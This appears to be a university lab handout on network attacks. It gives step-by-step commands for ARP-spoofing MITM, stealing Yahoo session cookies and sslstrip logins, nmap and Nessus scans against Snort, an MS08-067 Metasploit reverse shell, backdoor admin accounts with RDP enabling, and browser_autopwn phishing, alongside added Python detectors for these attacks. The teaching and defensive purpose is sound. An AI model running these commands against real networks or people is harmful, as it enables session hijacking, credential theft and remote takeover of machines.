Computer Networks Security
Laboratory Topic: Network Attacks
Adrian Furtună MSc, C|EH firstname.lastname@example.org
“With great power comes great responsibility”
1. Interception of network traffic transmitted using a clear-text protocol (HTTP)
   => obtaining session cookies
   => using session cookies to enter a victim's web session
2. Interception of network traffic transmitted using an encrypted protocol (HTTPS)
   => obtaining username and password for web login
3. Scanning the Windows VM using nmap (+Snort disabled/enabled)
4. Scanning the Windows VM using Nessus (+Snort disabled/enabled)
5. Gaining access to the Windows VM by exploiting a network service vulnerability
6. Gaining access to a Windows machine with a client-side attack:
   => social engineering
   => exploit browser vulnerability
   => use Metasploit to own the machine
Rules
It is forbidden:
• Any scanning / attack outside the laboratory network
• Any scanning / attack against your colleagues' machines or against the instructor's machine
Breaking these rules might lead to severe penalties.
Administrative tasks
Connect to ftp://email@example.com (username: stud, password: stud)
Download:
• Course slides
• VMWare Player: VMware-player-3.1.laptop.exe
• Windows VM: winxpsp2_web_snort.zip
• Backtrack VM: bt4-final-vm.zip
Install VMWare Player
Unzip both virtual machines
Virtual machine configuration
Laboratory setup (1)
You will work in pairs (1 pair = 2 distinct computers): attacker and victim
• Victim machine = host machine
• Attacker machine = Backtrack VM
Start Backtrack [username: root, password: toor]
Open graphic mode: startx &
Set the network card in bridge mode!
Obtain an IP address: dhclient eth0
Laboratory setup (2)
Exercise 1
Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail account.
• The victim needs a valid Yahoo mail account (a test account)
• The victim will open a web mail session
• The attacker:
  1. Becomes MITM
  2. Captures the network traffic of the victim and extracts the necessary data
Exercise 1 – cont.
Attacker machine: become MITM and intercept all traffic sent by the victim to the Gateway.
1. Find the IP addresses of Victim and Gateway (view the traffic using Wireshark)
2. Activate the routing process in Backtrack: echo 1 > /proc/sys/net/ipv4/ip_forward
3. Inform the Victim that the Gateway's MAC address is your MAC address – attacker (ARP poisoning using ARP replies): arpspoof -i eth0 -t IP_Victim IP_Gateway
4. View the network traffic of the Victim using Wireshark
Exercise 1 – cont.
Find the session cookies of the Victim and use them to enter his email session.
1. Wireshark -> Follow TCP stream on a TCP packet sent by the Victim
2. Copy the cookies Y and T in a text file
3. Install the Firefox plugin Add N Edit Cookies
4. Open a Yahoo mail session of your own (attacker)
5. Use the plugin to edit your cookies and replace Y and T with the ones of the Victim
6. Refresh the web page
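From the defender's side, the MITM step of this exercise (forged ARP replies rebinding the gateway's IP to another MAC) is visible on the LAN itself, which is what tools such as arpwatch watch for. The script below is an added example, not part of the lab, that applies two rules to a list of ARP replies: an IP whose MAC changes, and a MAC that answers for more than one IP. The sample replies, addresses, MACs and severity labels are constructed assumptions.

```python
"""Detect ARP cache poisoning of the kind arpspoof performs (added example).

The input is a list of (sender_ip, sender_mac) pairs taken from ARP replies
seen on the LAN; a sensor would feed it from a capture, here it is a
constructed sample. Two rules fire on a poisoning attempt:
 1. an IP already bound to one MAC is claimed by a different MAC
    (the first binding is trusted, as a static ARP entry would be);
 2. one MAC answers for more than one IP, the signature of a host
    inserting itself between a victim and the gateway.
Addresses, MACs and severity labels below are constructed assumptions.
"""
from collections import defaultdict

# Constructed sample: the gateway and a victim answer normally, then a third
# host starts answering for both of them.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01"),    # real gateway
    ("192.168.1.50", "00:11:22:33:44:50"),   # victim host
    ("192.168.1.77", "00:11:22:33:44:77"),   # third host
    ("192.168.1.1", "00:11:22:33:44:77"),    # forged: gateway IP now maps to third host
    ("192.168.1.50", "00:11:22:33:44:77"),   # forged: victim IP now maps to third host
]

PROTECTED_IPS = ("192.168.1.1",)  # gateway(s); a change here is rated HIGH


def detect_arp_poisoning(replies, protected_ips=PROTECTED_IPS):
    """Return alert strings, in the order the offending replies were seen."""
    ip_to_mac = {}                  # first MAC learned for each IP
    mac_to_ips = defaultdict(set)   # every IP each MAC has claimed
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.setdefault(ip, mac)
        if known != mac:
            severity = "HIGH" if ip in protected_ips else "MEDIUM"
            alerts.append(f"{severity}: {ip} changed from {known} to {mac}")
        claimed = mac_to_ips[mac]
        before = len(claimed)
        claimed.add(ip)
        # alert only when the set of IPs grows past one, not on every repeat
        if len(claimed) > before and len(claimed) > 1:
            alerts.append(f"MEDIUM: {mac} now claims {sorted(claimed)}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(line)
```

On the constructed sample the first alert is the HIGH one for the gateway, which is the event that matters: the forged reply for the gateway is what redirects the victim's traffic. The usual mitigations are a static ARP entry for the gateway on the victim and Dynamic ARP Inspection on managed switches; both make the first rule above a hard rule rather than an alert.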
Exercise 2
Intercept network traffic during a HTTPS session. Find the username and password of the Victim.
1. The victim accesses a web site using HTTPS (ex. Yahoo login)
2. Make yourself MITM (see exercise 1)
3. Start SSLSTRIP and make it listen on port 1234: sslstrip -l 1234 -s -w traffic.log
4. Configure IPTABLES to redirect HTTP traffic to SSLSTRIP: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234
5. Extract the useful information from the file traffic.log
More details here: http://www.thoughtcrime.org/software/sslstrip/
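The reason this exercise works is that the victim's first request goes out as plain HTTP and sslstrip rewrites the https:// links in the reply; the server-side control that closes that window is HTTP Strict Transport Security, which makes the browser refuse plain HTTP to the host once it has seen the policy. The checker below is an added example, not part of the lab, that parses a raw HTTPS response and grades its HSTS policy. The three sample responses, the example.test host and the 180-day threshold are constructed assumptions.

```python
"""Assess whether a site's HTTPS response defends against sslstrip (added example).

sslstrip succeeds because the victim's first request is plain HTTP and the
tool rewrites every https:// link in the reply before the browser sees it.
A browser that has already stored an HSTS policy for the host refuses to
send HTTP to it at all, so the downgrade never starts. This checker parses a
raw HTTP response received over TLS and reports the policy's strength. The
responses and the 180-day threshold below are constructed assumptions.
"""
import re

MIN_MAX_AGE = 180 * 24 * 3600  # assumed minimum policy lifetime, in seconds


def parse_headers(raw_response):
    """Return (status_code, {lowercase-name: value}) from a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    status_line, *lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def hsts_report(raw_https_response):
    """Summarise the Strict-Transport-Security policy and list weaknesses.

    Browsers ignore the header on plain-HTTP responses, so only the response
    received over TLS counts; pass that one here.
    """
    status, headers = parse_headers(raw_https_response)
    report = {"status": status, "hsts": False, "max_age": 0,
              "include_subdomains": False, "findings": []}
    policy = headers.get("strict-transport-security")
    if policy is None:
        report["findings"].append("no Strict-Transport-Security header: "
                                  "every first visit over HTTP is strippable")
        return report
    report["hsts"] = True
    match = re.search(r'max-age\s*=\s*"?(\d+)', policy, re.I)
    report["max_age"] = int(match.group(1)) if match else 0
    report["include_subdomains"] = "includesubdomains" in policy.lower()
    if report["max_age"] == 0:
        report["findings"].append("max-age=0 or missing: policy is cleared, not set")
    elif report["max_age"] < MIN_MAX_AGE:
        report["findings"].append("max-age below 180 days: policy expires between visits")
    if not report["include_subdomains"]:
        report["findings"].append("no includeSubDomains: a login host on a subdomain stays strippable")
    return report


# Constructed sample responses, as a TLS client would receive them.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><a href='https://login.example.test/'>Sign in</a></html>"
)
STRONG_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
SHORT_RESPONSE = (
    "HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=300\r\n\r\n<html></html>"
)

if __name__ == "__main__":
    for name, raw in (("weak", WEAK_RESPONSE), ("strong", STRONG_RESPONSE), ("short", SHORT_RESPONSE)):
        print(name, hsts_report(raw))
```

Even a strong policy only protects visits after the first one, which is why browsers ship a preload list; on the client side, the observable symptom during the exercise is that the login page arrives without the padlock and with an http:// address, the one thing the victim can still check.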
About Snort
Snort manual: http://www.snort.org/assets/166/snort_manual.pdf
• Network-based IDS
• Open source (free)
• Sourcefire – commercial version (appliance): http://www.sourcefire.com/
• Portable (Linux, BSD, Solaris, Windows, HP-UX, MacOS X, etc)
• Multiple mechanisms for intrusion detection:
  – Signatures (rules): www.bleedingsnort.com
  – Statistic anomalies
  – Protocol anomalies
About Snort – cont.
Data flow: Packet Stream -> Sniffing -> Packet Decoder -> Preprocessor (Plug-ins) -> Detection Engine (Plug-ins) -> Output Stage (Plug-ins) -> Alerts/Logs
Snort running modes:
• Sniffer mode (like tcpdump): snort.exe -v -d -e
• Packet logger: snort.exe -vde -l ..\log
• NIDS: snort.exe -d -l ..\log -c ..\etc\snort.conf
Nmap briefings
• TCP connect() scan: nmap -sT <IP Address>
• TCP SYN scan: nmap -sS <IP Address>
• UDP scan: nmap -sU <IP Address>
• Ping scan: nmap -sP <IP Address>
• TCP FIN / Xmas Tree / Null scan: nmap -sF/-sX/-sN <IP Address>
• Version detection: nmap -sS -sV <IP Address>
• OS fingerprinting: nmap -sS -O <IP Address>
Example: $ nmap -sS -sV -O -F -n 192.168.1.1
Change setup
Start the Windows VM
New attack direction: Backtrack -> Windows VM
Exercise 3
Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).
Obtain the following information (from a single scan):
• Live hosts
• Open TCP ports
• Service version
• Operating system
Save all output in a text file.
Hints: nmap -h, man nmap
Exercise 3 – cont.
Check if the scanning can be detected by a NIDS (Snort).
Authenticate to the Windows VM (password: user)
Start Snort:
• cmd.exe -> cd c:\snort\bin
• snort.exe -d -l ..\log -c ..\etc\snort.conf -A console
Perform the scanning again using Nmap.
Any alert? (see c:\Snort\log\alert.ids)
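The scan types in the Nmap briefing and the Snort check in this exercise rest on one detection idea: a scanner's packets do not look like a legitimate TCP session. The script below is an added example, not from the lab and not Snort's code, that applies the same logic a portscan preprocessor uses to a list of per-packet summaries: many SYN-only packets from one source to distinct ports (-sS or -sT), and flag combinations that no real session produces (-sN, -sF, -sX). The packets, addresses and port threshold are constructed assumptions; UDP and ping scans are not covered.

```python
"""Flag the Nmap scan patterns from the briefing in TCP packet summaries (added example).

Each packet is reduced to (src_ip, dst_ip, dst_port, flags) with flags as the
usual letters S/A/F/P/R/U. Detection logic, the same idea Snort's portscan
preprocessor applies:
 * -sS / -sT: one source sends SYNs to many distinct ports of one host;
 * -sN / -sF / -sX: a packet with no flags, FIN only, or FIN+PSH+URG, which
   no real TCP session produces, so a single one is worth an alert.
Packets, addresses and the port threshold below are constructed assumptions.
"""
from collections import defaultdict

PORT_THRESHOLD = 5  # distinct ports probed from one source before alerting

# Constructed sample: a SYN sweep of ports 21-30, a Null probe and an Xmas
# probe from .77, then an ordinary handshake and data from .50.
SAMPLE_PACKETS = (
    [("192.168.1.77", "192.168.1.10", port, "S") for port in range(21, 31)]
    + [("192.168.1.77", "192.168.1.10", 80, ""),      # Null scan probe
       ("192.168.1.77", "192.168.1.10", 443, "FPU")]  # Xmas Tree probe
    + [("192.168.1.50", "192.168.1.10", 80, "S"),
       ("192.168.1.50", "192.168.1.10", 80, "A"),
       ("192.168.1.50", "192.168.1.10", 80, "PA")]
)


def probe_type(flags):
    """Name the flag combination of a -sN/-sF/-sX probe, or None if legitimate."""
    bits = set(flags.upper())
    if not bits:
        return "NULL"
    if bits == {"F"}:
        return "FIN"
    if bits == {"F", "P", "U"}:
        return "XMAS"
    return None


def detect_scans(packets, threshold=PORT_THRESHOLD):
    """Return alert strings for probe packets and for SYN sweeps."""
    alerts = []
    syn_targets = defaultdict(set)  # (src, dst) -> ports that got a SYN-only packet
    for src, dst, dport, flags in packets:
        kind = probe_type(flags)
        if kind:
            alerts.append(f"{kind} scan probe {src} -> {dst}:{dport}")
        elif set(flags.upper()) == {"S"}:
            ports = syn_targets[(src, dst)]
            ports.add(dport)
            if len(ports) == threshold:  # alert once, when the sweep crosses the line
                alerts.append(f"SYN/connect scan {src} -> {dst}: {threshold} distinct ports")
    return alerts


if __name__ == "__main__":
    for line in detect_scans(SAMPLE_PACKETS):
        print(line)
```

A production sensor adds what this omits: a time window so that slow scans (Nmap's timing options) still accumulate, and per-source state that decays, since a busy client legitimately opens a handful of ports on one server. The single-packet rule for Null, FIN and Xmas probes needs neither, which is why those scans are the easiest to catch.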
Exercise 4
Scan the victim machine using Nessus to find vulnerabilities.
1. First install Nessus on BackTrack:
   Download Nessus (for Ubuntu 9.10 32 bit) from http://www.tenable.com
   dpkg -i Nessus-4.4.0.1-ubuntu910_i386.deb
2. Then obtain a Nessus activation code (Home Feed): http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed
3. Configure the Nessus server:
   Add a Nessus user: /opt/nessus/sbin/nessus-adduser
   Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE
   Start the Nessus server: /etc/init.d/nessusd start
4. Start the Nessus client: https://127.0.0.1:8834
Exercise 4 – cont.
1. Create a scan policy
2. Select plugins
3. Set target
4. Run scan
Sample vulnerability:
About Metasploit
Framework for writing and executing exploits
Modules: Exploits, Auxiliary, Payloads, Encoders, Nops
User interfaces:
• console: msfconsole
• GUI: msfgui
Updates: cd /pentest/exploits/framework3; svn update
Workflow: Select Exploit -> Configure options + payload -> Run exploit -> Execute payload
Tutorial: http://www.offensive-security.com/metasploit-unleashed
Exercise 5
We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to the Victim machine.
1. cd /pentest/exploits/framework3
2. ./msfconsole
3. help
4. search ms08-067
5. use exploit/windows/smb/ms08_067_netapi
6. show options
7. show payloads
8. set RHOST, PAYLOAD, LHOST, TARGET = 3, etc (for payload use windows/shell/reverse_tcp)
9. exploit
Execute Windows commands in the obtained shell (ex. ipconfig, hostname)
Exercise 5 – cont.
Obtain Remote Desktop access to the Victim machine:
• Add a new user: net user myuser mypassword /add
• Add the new user to the local Administrators group: net localgroup Administrators myuser /add
• Start the Remote Desktop service: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
• Check if the victim has opened the port for Remote Desktop (use nmap)
• Connect to the victim machine using: rdesktop 192.168.x.x &
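Each of the three changes above leaves a record in the Windows Security log, and together they form a textbook host takeover signature: an account is created, made a local Administrator and Remote Desktop is switched on within minutes, by the SYSTEM account (a service exploited over the network runs as SYSTEM). The correlation below is an added example, not part of the lab, over constructed event records. It uses the Vista-and-later event IDs 4720, 4732 and 4657; the XP SP2 VM in the lab logs the older numbers, and 4657 only appears when object-access auditing is enabled on that registry key. The timestamps, account names and 10-minute window are constructed assumptions.

```python
"""Correlate the Windows Security events left by the account and Remote
Desktop changes in Exercise 5 (added example, not from the lab).

Each command from the slide produces an auditable event:
  net user myuser mypassword /add            -> 4720 (user account created)
  net localgroup Administrators myuser /add  -> 4732 (member added to a
                                                security-enabled local group)
  reg add ... fDenyTSConnections ... /d 0    -> 4657 (registry value modified;
                                                needs object-access auditing
                                                with a SACL on the key)
The IDs are the Windows Vista and later ones; Windows XP logs older numbers.
The records and the correlation window below are constructed assumptions.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # assumed correlation window
RDP_VALUE = r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"

# Constructed sample, already parsed out of the Security log.
SAMPLE_EVENTS = [
    {"time": "2011-03-01T10:00:05", "id": 4720, "subject": "SYSTEM", "target": "myuser"},
    {"time": "2011-03-01T10:00:09", "id": 4732, "subject": "SYSTEM", "target": "myuser",
     "group": "Administrators"},
    {"time": "2011-03-01T10:00:20", "id": 4657, "subject": "SYSTEM",
     "object": RDP_VALUE, "new_value": "0"},
    {"time": "2011-03-01T15:30:00", "id": 4720, "subject": "helpdesk", "target": "newhire"},
]


def _when(event):
    return datetime.fromisoformat(event["time"])


def correlate_takeover(events, window=WINDOW):
    """Return one alert dict per account created and made Administrator within
    `window`, noting whether Remote Desktop was enabled around the same time."""
    created = {}        # target user -> (time, subject that created it)
    admin_at = {}       # target user -> time added to Administrators
    rdp_enabled_at = []  # times fDenyTSConnections was set to 0
    for event in sorted(events, key=_when):
        if event["id"] == 4720:
            created[event["target"]] = (_when(event), event["subject"])
        elif event["id"] == 4732 and event.get("group") == "Administrators":
            user = event["target"]
            if user in created and _when(event) - created[user][0] <= window:
                admin_at[user] = _when(event)
        elif (event["id"] == 4657 and event.get("object") == RDP_VALUE
              and event.get("new_value") == "0"):
            rdp_enabled_at.append(_when(event))
    alerts = []
    for user, when in admin_at.items():
        rdp = any(abs(t - when) <= window for t in rdp_enabled_at)
        by_system = created[user][1].upper() == "SYSTEM"
        alerts.append({
            "user": user,
            "created_by": created[user][1],
            "rdp_enabled": rdp,
            "severity": "HIGH" if (rdp or by_system) else "MEDIUM",
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate_takeover(SAMPLE_EVENTS):
        print(alert)
```

The helpdesk account creation in the sample produces no alert because nothing elevates it, which is the point of correlating rather than alerting on 4720 alone. The network-side counterpart is the last bullet of the slide read in reverse: a host that never listened on the Remote Desktop port and suddenly does is a change worth a scan-diff alert.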
What if?
• Victim has all ports closed (firewall)
• Operating system is patched
Answer: attack client applications and plugins (web browser, Acrobat Reader, MS Office, etc)
Change setup
Start the firewall of the Windows VM
Disable any exceptions
Use nmap to verify that there are no more open ports
Exercise 6
Exploit a browser vulnerability to gain remote access.
Use Metasploit and browser autopwn:
1. cd /pentest/exploits/framework3
2. ./msfconsole
3. use auxiliary/server/browser_autopwn
4. set LHOST 192.168.x.x (attacker IP)
5. set SRVPORT 80
6. set URIPATH mypictures.html
7. exploit
Exercise 6 – cont.
Send the victim an email containing the link: http://192.168.x.x/mypictures.html
Victim clicks the link
Attacker obtains a meterpreter session
Other useful tools
• Ettercap: http://ettercap.sourceforge.net
• Cain&Abel: http://www.oxid.it/cain.html
• The Middler: http://inguardians.com/tools
Q&A